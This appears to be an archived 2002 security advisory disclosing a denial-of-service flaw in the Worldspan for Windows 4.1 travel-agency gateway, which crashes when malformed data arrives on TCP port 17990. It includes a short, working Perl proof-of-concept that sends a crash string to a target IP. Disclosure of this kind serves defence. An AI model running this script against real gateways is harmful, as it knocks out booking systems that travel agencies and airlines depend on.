Vendor: Worldspan (www.worldspan.com) Software: Worldspan for Windows 4.1 Gateway Problem: Invalid packets sent to gateway crash system Fix: No response from vendor. All systems should be firewalled from outsiders but there is no protection from insiders. Overview: Worldspan is one of the leading companies which creates software for use by travel agents. Worldspan software is used by many travel agencies, airlines, and major travel websites. This adviosry focuses on Res Manager (Worldspan for Windows 4.1). A user running Res Manager is connected to a gateway system at their local site which is then connected to Worldspan via private lines or the internet. These gateway systems are the middle man between the agents and Worldspan. Blurb from website: "Worldspan provides global electronic distribution of travel information, Internet products and connectivity, and electronic commerce capabilities for travel agencies, travel service providers and corporations worldwide. The company's three lines of business are travel supplier services, e-commerce, and global distribution systems for the worldwide travel industry. The Worldspan reservations system provides nearly 21,000 travel agencies and other users worldwide with travel data and booking capabilities for hundreds of the world's leading travel supplier services. Worldspan is the market leader in e-commerce for the travel industry, processing more than 50 percent of all online travel agency bookings. The company maintains world headquarters in Atlanta, Georgia. Worldspan is owned by affiliates of Delta Air Lines, Inc., (NYSE:DAL), Northwest Airlines (NASDAQ:NWAC) and American Airlines. Additional information is available at www.worldspan.com" Description of software from website: http://www.worldspan.com/home.asp?fPageID=53&fBUnit=9&fBUCatID=24&fProductID =57 Problem: The Worldspan gateways are normally windows 95 or 98 systems which run the gateway (gw) software and accept connections from the agents then process these and send them to the Worldspan systems via private line or the internet. The gw system uses tcp port 17990 to communicate with the agents. If a malformed is sent to this port the system will attempt to process the it and eventually crash. From the research thus far it seems the system uses all system resources trying to process this packet and then crashes. In our lab the systems typically crash within 1 minute. Solution: These systems should be behind a firewall to be protected from outside attackers but due to the nature of the software there is no protection from internal users. The vendor has been contacted 3 times over the last 4 months but has not responded. Checking with a large customer of Worldspan it seems they have not attempted to inform their clients of this issue. We have spoken with our internal contacts at Worldspan and they had no information of this problem. The vendor has ignored this issue, but that can no longer be done. Proof of Concept: ------------------------------- #!/usr/bin/perl #altomoat_private #Worldspan Gateway DoS $sabre = "worldspanshouldgoboom"; use IO::Socket; $ip = "$ARGV[0]"; $port = "17990"; if ($#ARGV<0) { print " useage: $0 <ip>\n"; exit(); } $socket = IO::Socket::INET->new( Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port,); print "Worldspan Gateway DoS\n"; print "altomo\@digitalgangsters.net\n"; print "Wait about a minute, and it should crash.\n"; print $socket "$sabre\r"; close $socket; #nudehackers ------------------------- Q. Why write a DoS for some software no one has ever heard of? A. Learn the travel industry and this is bigger than it seems. --altomo
This archive was generated by hypermail 2b30 : Thu Jul 04 2002 - 14:46:19 PDT